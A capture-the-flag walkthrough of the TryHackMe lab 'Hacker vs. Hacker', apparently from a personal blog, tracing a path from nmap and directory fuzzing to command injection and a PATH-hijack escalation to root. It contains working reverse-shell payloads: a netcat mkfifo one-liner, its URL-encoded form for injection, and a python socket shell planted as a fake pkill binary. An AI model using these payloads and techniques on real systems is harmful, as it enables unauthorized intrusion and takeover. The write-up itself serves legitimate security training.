Hacker vs. Hacker

Hacker vs. Hacker

Try Hack Me Walkthrough

- ALi3nW3rX - 

Non Spoiler Nudge

  1. Check the source code
  2. Pay attention the cvs directory
  3. Try echo -e in your own terminal
  4. There's some processes to look out for
  5. Make sure to look at the PATH

Attack Path

  1. Enumeration and FUZZING
  2. Command Injection
  3. File Path Injection

We are going to do a full walkthrough on Hacker Vs. Hacker today. We are going to start out with our normal nmap scan.

We get 2 ports 80 and 22. Since we don't have any creds yet we are going to move past port 22 for now. Let's have a look at the website on 80.

Okay so we can upload something. This is most likely our way in or a starting point for us to start poking around.

Tried to upload a php rev shell with just a .php and with pdf.php because it says it only accepts pdf's. I had no luck with either so now we know we have to do some fuzzing to find a way in.

Using Feroxbuster we get a few directories we can start to explore now

The /dist is disabled so let's leave that one alone for now. /Images is nothing of real value. So with the couple of clues about CVS my suspicion is that CVS has a way in. So let's FUZZ /cvs and see what we get.

After many, many attempts at fuzzing and coming up with nothing. I had to sit back and think for a second. If I was hacking into this machine what would I do? I would upload a php file, ( which we tried ) and it didn't work. But we also saw that it only accepts PDF's. So what was our next move we rename the rev shell to shell.pdf.php and see if that works. ( we also tried this and it didn't work) So, let's try FUZZing ####.pdf.jpg? It's worth a shot at this point.

And looky, looky we got a cookie! Back to fuzzing!

After trying to FUZZ 'SHELL'.pdf.php with no luck I just started to manually enumerate the website. After a little bit of playing around I got a hit on 'CMD'

Alright cool we have some command injection! Let's get a shell in there. What I did was grab my one liner rev shell command and url encoded it on cyberchef.

💡
Just a side note here, you can do a lot with the command injection here if you url encode everything. You can actually get the user flag and the lower credentials. I'm sure if you tried hard enough you get could get much further. 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.14.25.127 6666>/tmp/f

And we get the code below. We can just copy and paste this into our url now.

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20%2Di%202%3E%261%7Cnc%2010%2E14%2E25%2E127%206666%3E%2Ftmp%2Ff

We have our netcat listener set up on the other side waitng for a rev shell to come through.

Boom We are in!

First thing we are going to do is get a stable shell. But this does not work out to well for us.

Seems like the previous hacker has put some speed bumps in our way. Okay cool we just have to use this shell. No big deal if we lose it, we can simply re run our netcat listener and refresh the website to get another shell.

We can easily grab the user.txt flag on this one. After this first thing we are checking is the .bash_history.

Oh! Looks like we have a password of some sort! Cool beans let's examine this for a min. So, not going to lie this took me a few min to figure out, but if you look at the password line it gives the 'echo -e' command. This allows the use of '\' in the command. Let's run this in our terminal and see what the output does.

Okay, it looks like we have 2 of the same passwords and some type of hash. Just to let you know this is not a hash of any kind that I could tell. So let's simply try to su lachlan with that password and see if it let's us in.

Sweet! We just elevated our privileges. Still got this shitty shell but it will work for us! And yes I tried to stabilize the shell again and still get the same result.

With that being said, the fact that every time we try to stabilize the shell it get's knocked down let's try to ssh in as lachlan now that we have a password and see if we can get a better shell.

Seems like our hacker friend is still messing with us. SSH is a no go.

One of the first things I look for on a machine is the processes running.

When we run a PS AUX we notice this process being executed that looks a little suspicious.

So what's interesting here is that if we notice that sleep is running under /bin/sleep and nope is running under /usr/bin/echo, but pkill doesn't have a path. And these are all running as root. So, first we are going to try and place a rev shell as pkill in our user folder and see what happens.

There is a backup.sh script in our /bin directory so let's try there first and see if we rename this and then add our script to it to get a shell as root.

On our attacker machine let's get a shell script ready and name it pkill

You can use whatever editor you are comfortable with.
#!/bin/sh 
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.14.25.127",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Now we are going to serve that up with a simple http server from the file location.

Back on our target machine we are going to download it.

Okay cool it worked.

Now we have to make it executable.

chmod +x pkill

Okay so let's get our netcat listener up and running on our attack machine.

Boom we are ROOOT!!

You have to work around the constant NOPES being thrown at you but luckily the root flag is right there and you can simply cat it out.

Hope this helped. Happy Hacking.